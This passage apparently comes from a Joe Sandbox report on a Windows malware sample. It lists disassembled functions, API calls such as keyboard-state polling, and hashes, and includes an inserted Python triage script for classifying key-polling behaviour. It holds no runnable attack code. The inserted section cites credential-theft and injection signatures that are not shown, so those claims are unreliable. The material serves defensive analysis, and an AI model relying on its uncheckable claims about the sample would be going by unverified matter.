                                                                          • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                          • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                          • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                          • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: DestroyWindow
                                                                          • String ID: static
                                                                          • API String ID: 3375834691-2160076837
                                                                          • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                          • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                          • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                          • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                          • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DriveType
                                                                          • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                          • API String ID: 2907320926-3566645568
                                                                          • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                          • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                          • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                          • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                          APIs
                                                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                          • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                          • DeleteObject.GDI32(?), ref: 00470A04
                                                                          • DestroyIcon.USER32(?), ref: 00470A1C
                                                                          • DeleteObject.GDI32(?), ref: 00470A34
                                                                          • DestroyWindow.USER32(?), ref: 00470A4C
                                                                          • DestroyIcon.USER32(?), ref: 00470A73
                                                                          • DestroyIcon.USER32(?), ref: 00470A81
                                                                          • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 1237572874-0
                                                                          • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                          • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                          • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                          • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                          APIs
                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                          • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                          • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                          • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                          • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                          • VariantClear.OLEAUT32(?), ref: 00479489
                                                                          • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                          • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                          • String ID:
                                                                          • API String ID: 2706829360-0
                                                                          • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                          • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                          • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                          • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 0044480E
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                          • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                          • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                          • GetKeyState.USER32(00000011), ref: 00444903
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                          • GetKeyState.USER32(00000012), ref: 0044492D
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                          • GetKeyState.USER32(0000005B), ref: 00444958
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                          • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                          • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                          • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
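                                                                          The entry above polls only modifier keys (0xA1 VK_RSHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU, 0x5B VK_LWIN) through GetKeyState/GetAsyncKeyState; on its own that pattern is consistent with hotkey or Send()-style modifier handling rather than full keystroke capture, so it should be weighed together with the thread-injection and credential-theft signatures listed at the top of the report. To make that triage repeatable, the following added example (editorial code, not part of the Joe Sandbox report or of the sample) parses the report's per-function API lines, including the indented "Part of subcall function" entries, resolves the hex first argument of the key-state APIs to a virtual-key constant, and summarizes which keys a function polls. The sample lines are constructed from this section of the report; the `VK_NAMES` table and the `keyboard_polling_summary` helper are assumptions introduced for the example.

```python
import re

# Constructed sample: API-call lines in the shape Joe Sandbox emits per function
# block, copied from this section of the report (top-level and subcall entries).
SAMPLE_LINES = """\
• GetAsyncKeyState.USER32(00000011), ref: 004448F5
• GetKeyState.USER32(00000011), ref: 00444903
• GetAsyncKeyState.USER32(00000012), ref: 0044491F
• GetKeyState.USER32(00000012), ref: 0044492D
• GetAsyncKeyState.USER32(0000005B), ref: 00444949
• GetKeyState.USER32(0000005B), ref: 00444958
• GetKeyState.USER32(000000A1), ref: 004448D9
  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
• CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
• CoInitialize.OLE32 ref: 0046C63A
""".splitlines()

# One report line: optional subcall prefix, API.MODULE, optional (args), call-site address.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Assumed lookup table: the modifier-key virtual-key codes relevant to this entry.
VK_NAMES = {
    0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
    0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
    0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL",
    0xA3: "VK_RCONTROL", 0xA4: "VK_LMENU", 0xA5: "VK_RMENU",
}

KEY_STATE_APIS = {"GetKeyState", "GetAsyncKeyState"}


def parse_api_line(line):
    """Parse one '• API.MODULE(args), ref: ADDR' entry; None for lines that are not API calls."""
    m = API_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": [a.strip() for a in raw.split(",")] if raw else [],
        "ref": int(m.group("ref"), 16),
        "subcall_of": int(m.group("sub"), 16) if m.group("sub") else None,
    }


def parse_block(lines):
    """Return the parsed API calls of one function block, skipping headings and dump metadata."""
    return [c for c in map(parse_api_line, lines) if c]


def vk_name(arg):
    """Resolve a hex argument to a VK constant; None for symbolic ('?') arguments."""
    try:
        code = int(arg, 16)
    except ValueError:
        return None
    return VK_NAMES.get(code, f"VK_0x{code:02X}")


def keyboard_polling_summary(calls):
    """Summarize GetKeyState/GetAsyncKeyState usage: which keys, how many calls, how many unresolved."""
    polled, unresolved, count = set(), 0, 0
    for c in calls:
        if c["api"] not in KEY_STATE_APIS:
            continue
        count += 1
        name = vk_name(c["args"][0]) if c["args"] else None
        if name is None:
            unresolved += 1          # '?' means the sandbox could not recover the argument
        else:
            polled.add(name)
    return {
        "calls": count,
        "polled_keys": sorted(polled),
        "unresolved": unresolved,
        # True when every resolved key is a modifier: hotkey handling, not keystroke capture
        "modifiers_only": bool(polled) and polled <= set(VK_NAMES.values()),
    }


if __name__ == "__main__":
    calls = parse_block(SAMPLE_LINES)
    for c in calls:
        print(f"{c['ref']:08X} {c['api']}.{c['module']}({', '.join(c['args'])})")
    print(keyboard_polling_summary(calls))
```

Feed it the API lines of any function block from the report; a block whose `polled_keys` contains alphanumeric VK codes (or a loop over the whole VK range) is the one to inspect for keylogging, while a modifier-only result like this entry's points at hotkey handling.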
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                          • String ID:
                                                                          • API String ID: 3413494760-0
                                                                          • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                          • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                          • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                          • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _strncmp
                                                                          • String ID: '$DEFINE$\$`$h$h
                                                                          • API String ID: 909875538-3708680428
                                                                          • Opcode ID: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                                                                          • Instruction ID: 816ce89e9d314c50cae2ff635e2dae77420ade2a81b985ada7b38a9c48760da0
                                                                          • Opcode Fuzzy Hash: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                                                                          • Instruction Fuzzy Hash: C502B470A042498FEF14CF69C9906AEBBF2FF85304F2481AED8459B341D7399946CB55
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                          • String ID: AU3_FreeVar
                                                                          • API String ID: 2634073740-771828931
                                                                          • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                          • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                          • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                          • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                          APIs
                                                                          • CoInitialize.OLE32 ref: 0046C63A
                                                                          • CoUninitialize.OLE32 ref: 0046C645
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                            • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                          • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                          • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                          • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                          • API String ID: 2294789929-1287834457
                                                                          • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                          • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                          • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                          • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                          APIs
                                                                            • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                            • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                          • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                          • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                          • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                          • ReleaseCapture.USER32 ref: 0047116F
                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                          • API String ID: 2483343779-2107944366
                                                                          • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                          • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                          • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                          • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                          • _wcslen.LIBCMT ref: 00450720
                                                                          • _wcscat.LIBCMT ref: 00450733
                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                          • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window_wcscat_wcslen
                                                                          • String ID: -----$SysListView32
                                                                          • API String ID: 4008455318-3975388722
                                                                          • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                          • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                          • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                          • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                          • GetParent.USER32 ref: 00469C98
                                                                          • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                          • GetParent.USER32 ref: 00469CBC
                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 2360848162-1403004172
                                                                          • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                          • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
